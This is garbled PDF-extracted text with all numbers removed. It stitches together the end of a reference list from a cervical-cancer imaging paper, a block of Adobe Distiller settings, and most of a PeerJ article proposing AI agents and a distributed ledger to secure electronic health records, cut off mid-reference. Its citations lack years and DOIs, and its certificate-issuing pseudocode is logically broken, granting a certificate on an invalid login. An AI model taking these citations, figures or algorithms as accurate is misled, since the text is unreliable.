bulletin ( ): – doi . /h . cortes c, vapnik v. . support vector machine. machine learning ( ): – . howard j, gugger s. . fastai: a layered api for deep learning. information: an international interdisciplinary journal ( ): . isa nm. . automated edge detection technique for pap smear images using moving k-means clustering and modified seed based region growing algorithm. international journal of the computer, the internet and management ( ): – . loshchilov i, hutter f. . fixing weight decay regularization in adam. available at https://arxiv.org/abs/ . . pan sj, yang q. . a survey on transfer learning. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . papanicolaou gn, traut hf. . the diagnostic value of vaginal smears in carcinoma of the uterus. american journal of obstetrics and gynecology ( ): – doi . /s - ( ) - . plissiti me, dimitrakopoulos p, sfikas g, nikou c, krikoni o, charchanti a. . sipakmed: a new dataset for feature and image based classification of normal and pathological cervical cells in pap smear images. in: th ieee international conference on image processing (icip). piscataway: ieee, – . plissiti me, nikou c, charchanti a. . automated detection of cell nuclei in pap smear images using morphological reconstruction and clustering. ieee transactions on information technology in biomedicine ( ): – doi . /titb. . . saslow d, solomon d, lawson hw, killackey m, kulasingam sl, cain j, garcia far, moriarty at, waxman ag, wilbur dc, wentzensen n, downs ls jr, spitzer m, moscicki a-b, franco el, stoler mh, schiffman m, castle pe, myers er. . american cancer society, american society for colposcopy and cervical pathology, and american society for clinical pathology screening guidelines for the prevention and early detection of cervical cancer. american journal of clinical pathology ( ): – doi . /ajcptgd evrsjcg. selvaraju rr, cogswell m, das a, vedantam r, parikh d, batra d. . grad-cam: visual explanations from deep networks via gradient-based localization. in: proceedings of the ieee international conference on computer vision. – . bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://mde-lab.aegean.gr/index.php/downloads http://mde-lab.aegean.gr/index.php/downloads https://www.cs.uoi.gr/~marina/sipakmed.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /h https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /titb. . http://dx.doi.org/ . /ajcptgd evrsjcg http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ simonyan k, vedaldi a, zisserman a. . deep inside convolutional networks: visualising image classification models and saliency maps. available at https://arxiv.org/abs/ . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. available at https://arxiv.org/abs/ . . smith ln. . a disciplined approach to neural network hyper-parameters: part -learning rate, batch size, momentum, and weight decay. available at https://arxiv.org/abs/ . . smith ln, topin n. . super-convergence: very fast training of neural networks using large learning rates. in: artificial intelligence and machine learning for multi-domain operations applications, volume . international society for optics and photonics, . solomon d, davey d, kurman r, moriarty a, o’connor d, prey m, raab s, sherman m, wilbur d, wright t jr, young n. . the bethesda system: terminology for reporting results of cervical cytology. jama ( ): – . szegedy c, ioffe s, vanhoucke v, alemi a. . inception-v , inception-resnet and the impact of residual connections on learning. available at https://arxiv.org/abs/ . . tan m, le qv. . efficientnet: rethinking model scaling for convolutional neural networks. available at https://arxiv.org/abs/ . . world health organization. a. comprehensive cervical cancer control: a guide to essential practice . geneva: world health organization. world health organization. b. latest global cancer data: cancer burden rises to . million new cases and . million cancer deaths in . geneva: world health organization. yosinski j, clune j, bengio y, lipson h. . how transferable are features in deep neural networks? in: advances in neural information processing systems, – . zhang l, lu l, nogues i, summers rm, liu s, yao j. . deeppap: deep convolutional networks for cervical cell classification. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . zhang q, nian wu y, zhu s-c. . interpretable convolutional neural networks. in: proceedings of the ieee conference on computer vision and pattern recognition. – . bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /jbhi. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. cervical cancer detection in pap smear whole slide images using convnet with transfer learning and progressive resizing introduction datasets proposed methodology results and discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records fahad f. alruwaili computer science, college of computing and information technology, shaqra university, shaqra, kingdom of saudi arabia abstract background: application of artificial intelligence (ai) and the use of agent-based systems in the healthcare system have attracted various researchers to improve the efficiency and utility in the electronic health records (ehr). nowadays, one of the most important and creative developments is the integration of ai and blockchain that is, distributed ledger technology (dlt) to enable better and decentralized governance. privacy and security is a critical piece in ehr implementation and/or adoption. health records are updated every time a patient visits a doctor as they contain important information about the health and wellbeing of the patient and describes the history of care received during the past and to date. therefore, such records are critical to research, hospitals, emergency rooms, healthcare laboratories, and even health insurance providers. methods: in this article, a platform employing the ai and the use of multi-agent based systems along with the dlt technology for privacy preservation is proposed. the emphasis of security and privacy is highlighted during the process of collecting, managing and distributing ehr data. results: this article aims to ensure privacy, integrity and security metrics of the electronic health records are met when such copies are not only immutable but also distributed. the findings of this work will help guide the development of further techniques using the combination of ai and multi-agent based systems backed by dlt technology for secure and effective handling ehr data. this proposed architecture uses various ai-based intelligent based agents and blockchain for providing privacy and security in ehr. future enhancement in this work can be the addition of the biometric based systems for improved security. subjects adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence keywords artificial intelligence, agents and multi-agent systems, adaptive & self-organizing systems, electronic health records, distributed ledger systems introduction the rapid improvement of digitizing the healthcare has led to the creation of huge electronic records of patients. such progress paves a way for unparalleled demands for the protection of healthcare data and at the time of utilizing and transferring these data. e-health systems can be a better alternative for maintaining the medical records globally how to cite this article alruwaili ff. . artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted november published november corresponding author fahad f. alruwaili, alruwaili@su.edu.sa academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright alruwaili distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:alruwaili@�su.�edu.�sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ and connectedly and can be further accessed the clinical information on the basis of its requirement (wiljer et al., ). there is a rapid increase in the applicants of ehr in e-health which uses the mobile based devices in order to provide medical assistance. some of the medical services such as acquisition of data through online, and also in person, transferring these data towards other medical service providers etc. the ehr is a digital based medical data preserving and processing platform which is easily accessible to the patient as well as the doctors (zurita & nøhr, ). the main aim of this ehr is to monitor and to maintain the patients’ medical data more securely. this includes the overall medical history of the patient, current health condition, demographic details about the patient etc. this ehr acts as a repository for storing, transferring the medical data more securely (kumar & lee, ). the patient, doctor and the medical service provider can fetch the data whenever and where ever necessary. service providers need to update the given services to maintain consistency. in fact, various regulations and standards have been proposed by earlier researchers (oecd, ) in order to protect the privacy of ehr. these rules and regulations require tough measures of security while sharing and exchanging the health data. if the sharing failed to follow the rules, strong sanctioned were imposed on the violators with severe penalties. the introduction of ai and multi-agent based systems into the health data make it easy for the management to take its decisions and the actions, and ensures the communication and coordination by minimizing the errors of analysis and treatment, and by improve time required to look for the medical resources, and other medical departments. the main goal of ai-based ehr security is to create methodology, tools, and facilities for the maintenance and transfer of health data through the ehr. electronic health records are live and systems based on the patient. this makes the patient data to be accessed and handled by users who are authorized to use it. these data are in a digital format which is collected based on the already developed standards for maintaining the patients’ health records. in this ehr, the data can be handled by the patient or an authorized doctor and the service provider. it is stored in a cloud-based servers which can be accessed only by the users (zhang et al., ; shinde & patil, ). the users and the data were connected through a network. all the requests and transmissions were done through the network (shinde & patil, ). though there were various advantages present in this ehr, it is more vulnerable to various types of attacks. this is due to its design architecture (om & talib, ). various threats in the level of collecting data (habib, torjusen & leister, ; saleem, ullah & kwak, ; chelli, ; kumar & lee, ; saleem, ullah & yoo, ; om & talib, ), transmission (ismail & ammar, ; partala et al., ; niksaz, ; bonab & masdari, ), and storage (santos-pereira et al., ; zhang & liu, ; drosatos et al., ; fatema & brad, ; wellington, ) were present in this ehr’s. due to these threats, some of the users are concerned to employ this ehr to save and transmit their health data (ismail & ammar, ). hence, a novel methodology for providing privacy and security combining the ai-based intelligent agents and blockchain is proposed in this article. alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contributions of the present research � various techniques were proposed earlier researchers for enhancing the security and electronic based health record. enhancement of ehr systems are under process. � a proposal of combining the ai, agent based systems along with the blockchain based technology for providing privacy and security in the electronic health record. � the proposed ai-based dls technology achieves better accuracy in providing security and privacy while utilizing and sharing the ehr data. this research work is done in order to analyze the drawbacks present in the existing privacy and security preserving methodologies for the ehr data sets and to propose a novel method for providing privacy and security in it. attributes of the distributed ledger technology � a dlt is a distributed digital record of transactions (zhang, zhong & tian, ; zhang et al., ). the terminology comes from its structure, where, the individual records called blocks. these blocks are linked together with each other, and in accordance with the implemented consensus protocol, in single list which is called a chain. the current implementation of dlt is now seeing in recording crypto currencies transactions. the notion of decentralization is core component; hence, any involved transactions cannot be altered without the alteration of all concurrent blocks. � the key characteristics of the dlt include � decentralization � persistency � anonymity and � auditability � the key advantages and features of dlt technologies, includes: � immutability: it means one-way writing to the ledger, hence difficult to tamper or alter a block or committed transaction. � irreversibility: it prevents double spending. � distribution of records: it means that a copy of the ledger is present with all its members. � no centralized authority or third party: it is a peer-to-peer network. � resiliency: it is not prone to any sort of major attacks. blockchain blockchain (dlt) is considered to be the next big technological revolution, as it is reinventing the way we work and live (zheng et al., ; perdana et al., ; sun et al., ). the structure of blockchain is shown in fig. . the idea of the dlt was first introduced by a researcher who implemented the digital crypto currency known as bitcoin. dlt has become an integral part of bitcoin’s operation (li et al., ). for several decades, researchers have been dealing with information exchange and the transfer of money and other assets through online transactions through the internet, where each of alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these transactions involved a trusted intermediary. it is provides a secure exchange and traceability in the event of any failures in case of a security breach. in a shift of paradigm, the dlt removes centralized authority which is present in-between multiple entities which are processing the financial and other transactions on data using a public ledger which is incorruptible, immutable, and decentralized in nature. the dlt based technology can come up with acceptable results in the certification system for learning, receivable to the non-changeable and the cryptographic nature of the data based on blockchain. it can complete complex transaction operations without human intervention. the system also supports automatic execution and automatic verification. smart contract technology can simplify the process of transaction, smart realization, making it automated and decentralized and to enhance the security of the transaction. ai and multi agent based systems ai is the process of recognizing something it has never seen before and predict the future, by extracting patterns in the past (harel, gal & elovici, ; bali, garg & bali, ). ai deals with the study and design of intelligent based agents which maintains the environment, takes actions which increases the chance for occurring success. intelligent agents or adaptive & self-organizing systems are autonomous based system which is more flexible in receiving and processing the input for generating the output with respect to the input. agent-based systems are communicating systems of distributed ai. these systems work by communicating with each other based on a set of rules and constraints in order to solve a common problem. however, agent-based systems usually consist of one learning ai agent and other pattern of ais. an ai-based multi-agent system is a computerized system which consists of multiple interacting intelligent agents. multi-agent systems can solve problems which are difficult for an individual system. these intelligent based agents can get the data in the form of knowledge directly from the users. these users can be also called as environment. intelligent agents can perform a specific task for the given inputs. these systems can process the inputs from humans or other form of agents. these agents can also be able to combine with other agents in order to perform a process. generating a system based on the intelligent agent is not a difficult process since it can be done just by combining the existing agents with agents. this forms the multi agent based architecture. for example, a network monitoring agent can be created by figure structure of blockchain. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ combining the network system with an agent by not altering the entire mechanism. architecture of an intelligent agent is shown in fig. . the security and privacy opportunity the dlt combined with ai integration presents a new and innovative approach to achieve smart, resilient and secure handling of ehr data. various works has been done by previous researchers regarding the security and privacy using the multi agent bases systems (tsochev et al., ; grzonka et al., ; ahmed et al., ; gruson et al., ; stein et al., ). the fact that increased adoption of autonomous systems e.g. internet of things, opens the door for insecure and cyber-criminal activities, hence a greater need to ensure security, control and compliance. with this increased connectivity and reliance of other healthcare systems across different healthcare stakeholders (e.g., pharmacy, imagery, prescriptions, physicians, insurance) a greater need for privacy protection to keep patients and hospitals records safe and secure is critical. the gap intensifies when urgent actions are needed to protect or recover ehr transactions against cyberattacks. the utility of greater intelligence in making decisions about threats and cyberattacks can be utilized. the ai agents are used to gather the necessary threats/cyberattacks information from multiple deployed sensors to help steer the decision making process. in addition, automation of actionable policies to protect ehr can be codified into a smart contracts with will be triggered based on the given event (if-then-else condition statement). figure shows the main important characteristics of the blockchain (dlt) and ai. proposed methodology the proposed methodology is designed to provide privacy and security in ehr database using the application of artificial intelligence and multi agent based distributed ledger system. this framework is secured since the blockchain and various software based figure architecture of the multi agent-based system. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ agents are used in between the data which are available in the public servers. in this method, the user has full privilege to access the system. the user can update, edit, modify and delete the contents present in the database which is connected with the system. architecture of the proposed system is shown in fig. which has two types intelligent agent such as the user interface agent, dlt based authentication agent. this forms the multi agent based technology. the user interface agent collects all the information about users who are accessing the database. the dlt based authentication agent generates a digital certificate for accessing or transferring the data from the server towards the connected devices. all these information’s were stored in the server. these intelligent dlt based multi agent systems provide the communication between users and the ehr service provider. flowchart of the proposed methodology is shown in fig. . the user interface agent is also responsible for defining the protocols for defining an accessing entity as a user. these protocols are based on the already set rules. a centralized server is used to stores all the health related information of the patient. this server is connected to the authentication agent. this server also called as the health record database consists of user credentials for accessing the entire ehr system. an authentication agent is an intelligent agent which is connected with the health record database or server which can be used to validate the entry of user. it is also used to verify the user credentials present in the health database. the proposed system consists of two intelligent based connected agents such as the user interface and the dlt based authentication agent. the authentication agent is also connected with the dlt based system which can only figure main characteristics of the blockchain (dlt) and ai. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant access to the users. this agent makes effective comparison of the already stored datasets of the users and the providers who are willing to access the datasets by issuing a digital certificate based on the blockchain technology. various operations such as user interface establishment, user registration, comparison of the already existing data, and its maintenance where depicted by this intelligent based agents. the basic information such as username, passwords, user credentials, birth date, mobile number etc. and all the necessary information related to the health regarding the patient are stored in the health record database or server. schematic representation of the proposed methodology is shown in fig. . working principle user interface agent acts as an interface between the user and the entire system. this user interface agent is used to establish the connection between the users and authentication agent. the user interface agent present in between the users and the authentication agent accept the sign in request from the user. the user can be a patient, a doctor or a provider healthcare. this user interface agent accepts the user credentials required for logging in. the user credentials can be a username and a password. the user interface agent is established through an application which can be either a website or a mobile based. figure flowchart of the proposed methodology. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user can enter his user name and password in the provided interface. if the user forgot the username or password, it can be easily accessed by the security protocols functions present in the interface. the dlt based authentication agent receives the user name and password. all the user credentials received by the user interface agent were passed to the dlt based authentication agent for further accessing whether the credentials belongs to the saved users or not. the dlt based authentication agent checks the obtained user name and password of the user from the stored datasets. the username and passwords were already stored in the database as shown in fig. . after validating the credentials, it generates a digital certificate to the user. connection is established in between the server and the dlt based authentication agent for accessing the ehr data. the dlt based authentication agent present in between the user interface agent and the server generates a figure architecture of the proposed model. full-size doi: . /peerj-cs. /fig- figure schematic representation of the proposed methodology. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ digital certificate in order to access the data in terms of using as well as transferring. if the digital certificate is generated, then the user can access, transfer data towards the ehr server. by this method, the ehr data cannot be easily accessed by un-authorized users or by un-authorized login. overall architecture of the proposed model is shown in fig. . all the information regarding the logging in will be also stored in the database or the server in the form of references for next authentication process. if the credentials of the user who is willing to access the database is not stored in the server, then a user registration form will be provided so that the new user can register him for accessing the data. it is further analyzed by the authentication agent and it will grant permission to access based on the priority. once the user is verified then he will granted permission to access the data and the connection will be established for the user to access the database. algorithm for the agent based systems procedure for user verification begin initialize for every agent v and every user u, read the user credentials if (u = username & password) and ui = <u, p> then, forward to the user interface agent; else enter the valid username and password; end if, end for procedure for user interface agent begin initialize each agent ai v initialize a to do list where lij j ¼ vi check the user and its interface read the user credentials u = <ui> then, forward to the dlt based authentication agent; else unauthorised user; end if, end for alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm for generating digital certificates main module of the proposed algorithm starts with a login process. a user can log in from the user interface agent with the starting time as zero. the logging in time will be h where the system allows the user to obtain a digital certificate. at once the user verification is done, the user particulars were updated in the server. if the user didn’t obtained a smart contract already, then the user particulars were entered in the digital certificate with the user address stored in the dc. then the user particulars were sent towards the execution process of smart contract. at once the user particulars were updated, the system produces a digital certificate. the algorithm for generating a digital certificate is shown below login = ok, start_time == , user_verification = ok if login == valid and start_time >= hour: then: update user_particulars; smart contract = no if login == not valid or start_time <= hour then: dc = digital_certificate(user_particulars); address = dc_address; send user_particulars to address: excute smart_contract = sc_address (user_particulars); if smart_contract = ok then: add block_credit to dc_blockchain; issue (digital_certificate); end if end if end if motivation and scope � the proposed methodology provides the health data as privacy preserved and secured. � the proposed system is monitored and maintained by the ai-based multi agent systems. � the proposed system consists of two intelligent based connected agents such as the user interface and the dlt based authentication agent. � these multi agents can be used to validate the user ans also yto generate the digital certificates. � digital certificates are generated by blockchain based intelligent agents for restricting the un-authorized users. � ai and blockchain based intelligent agents communicates between the users and the ehr server through the network. alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison with existing methods in this section a detailed comparison between the proposed methodology and the existing methods for providing privacy and security for health datasets are depicted. in the care model, the intelligent agent based system is employed where each and every entities and their role are monitored. in multi agent system for patient-centered method, only the intelligent agents were assigned for individual patients. in agent based medical server and wireless sensor network, only individual agents are assigned for all the entities such as the patient, supervisor, doctor and manager. in algorithms based on biometrics based technologies, eeg, ecg and finger print sensors were employed for the authentication purpose. in the proposed method, intelligent multi agents along with the dlt based systems is used for user authentication and also for providing access to the ehr datasets. table shows the comparison of techniques for various e-health security methods. conclusion and future work e-health systems can be a better alternative to maintain the medical records globally and connectedly and can be further accessed the clinical information on the basis of its requirement. due to the fast improvement of the users among the ehr, e-health and m-health, applications based on mobile devices which provide medical services such as the data collections of online users were facing a challenge in securing, storing and accessing the data. patient’s health record which was used in various treatments should be secured. these records were used by various doctors and specialists of the healthcare while providing the treatments to patients. a combination of ai bases intelligent agents and blockchain technology is proposed in this article in order to provide security and privacy for the ehr from unauthorized access and usage. intruders can change the information, alter the entire data, introduce an unauthenticated and false data, etc. this system avoids these types of attacks caused by the un-authorized users and users with the help of intelligent agents and blockchain technology by generating a smart contract. this proposed architecture uses various ai-based intelligent based agents and blockchain for the entire process. future enhancement in this work can be the addition of the biometric based systems for improved security. table comparison of techniques for various ehr security method. ehr security methods technique used care model modules for each actors and their role patient-centered multi agent system agents for individual users body sensor network and agent based medical server agents for patient, supervisor, doctor and manager biometric based method electrocardiogram and finger print for the authentication purpose. biometrics based method electrocardiogram and photoplethysmography for the authentication purpose. proposed method blockchain along with multi agents for user interface, authentication, smart contract for accessing the ehr data alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the author received no funding for this work. competing interests the author declares that they have no competing interests. author contributions � fahad f. alruwaili conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahmed z, mohamed k, zeeshan s, dong xq. . artificial intelligence with multi-functional machine learning platform development for better healthcare and precision medicine. database :baaa doi . /database/baaa . bali j, garg r, bali rt. . artificial intelligence (ai) in healthcare and biomedical research: why a strong computational/ai bioethics framework is required? indian journal of ophthalmology ( ): – doi . /ijo.ijo_ _ . bonab th, masdari m. . security attacks in wireless body area networks: challenges and issues. academie royale des sciences d outre-mer bulletin des seances ( ): – . chelli k. . security issues in wireless sensor networks: attacks and countermeasures. in: proceedings of the world congress on engineering. drosatos g, efraimidis ps, williams g, kaldoudi e. . towards privacy by design in personal e-health systems. available at https://www.scitepress.org/papers/ / /pdf/index.html. fatema n, brad r. . security requirements, counterattacks and projects in healthcare applications using wsns: a review. arxiv preprint arxiv: . . gruson d, helleputte t, rousseau p, gruson d. . data science, artificial intelligence, and machine learning: opportunities for laboratory medicine and the value of positive regulation. clinical biochemistry : – doi . /j.clinbiochem. . . . grzonka d, jakóbik a, kołodziej j, pllana s. . using a multi-agent system and artificial intelligence for monitoring and improving the cloud performance and security. future generation computer systems : – doi . /j.future. . . . habib k, torjusen a, leister w. . security analysis of a patient monitoring system for the internet of things in ehealth. in: proceedings of the international conference on ehealth, telemedicine, and social medicine (etelemed' ). alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /database/baaa http://dx.doi.org/ . /ijo.ijo_ _ https://www.scitepress.org/papers/ / /pdf/index.html http://dx.doi.org/ . /j.clinbiochem. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ harel y, gal ib, elovici y. . cyber security and the role of intelligent systems in addressing its challenges. acm transactions on intelligent systems and technology ( ): doi . / . ismail keshta, ammar odeh. . security and privacy of electronic health records: concerns and challenges. egyptian informatics journal doi . /j.eij. . . . kumar p, lee h-j. . security issues in healthcare applications using wireless medical sensor networks: a survey. sensors ( ): – doi . /s . li s, zhao s, yang p, andriotis p, xu l, sun q. . distributed consensus algorithm for events detection in cyber physical systems. ieee internet of things journal ( ): – doi . /jiot. . . niksaz p, young researchers and elite club, mashhad branch. . wireless body area networks: attacks and countermeasures. international journal of scientific & engineering research ( ): – . oecd. . recommendation of the council concerning guidelines governing the protection of privacy and transborder flows of personal data. c( ) /final, , – . available at https://www.oecd.org/sti/ieconomy/ -oecd-privacy-guidelines.pdf. om s, talib m. . wireless ad-hoc network under black-hole attack. international journal of digital information and wireless communications (ijdiwc) ( ): – . partala j, keräneny n, särestöniemi m, hämäläinen m, iinatti j, jämsä t, reponen j, seppänen t. . security threats against the transmission chain of a medical health monitoring system. in: ieee th international conference on e-health networking, applications & services (healthcom), – october , lisbon, portugal. piscataway: ieee. perdana a, robb a, balachandran v, rohde f. . distributed ledger technology: its evolutionary path and the road ahead. information & management. doi . /j.im. . . saleem s, ullah s, kwak ks. . a study of ieee . . security framework for wireless body area networks. sensors ( ): – doi . /s . saleem s, ullah s, yoo hs. . on the security issues in wireless body area networks. international journal of digital content technology and its applications ( ): – doi . /jdcta.vol .issue . . santos-pereira c, augusto ab, cruz-correia r, correia me. . a secure rbac mobile agent access control model for healthcare institutions. in: proceedings of the th ieee international symposium on computer-based medical systems. piscataway: ieee. shinde ss, patil d. . review on security and privacy for mobile healthcare networks: from a quality of protection perspective. international journal of engineering research ( ): – . stein jd, rahman m, andrews c, trager eh, narayanaswamy p, hanauer da. . evaluation of an algorithm for identifying ocular conditions in electronic health record data. jama ophthalmology ( ): – doi . /jamaophthalmol. . . sun x, zou j, li l, luo m. . a blockchain-based online language learning 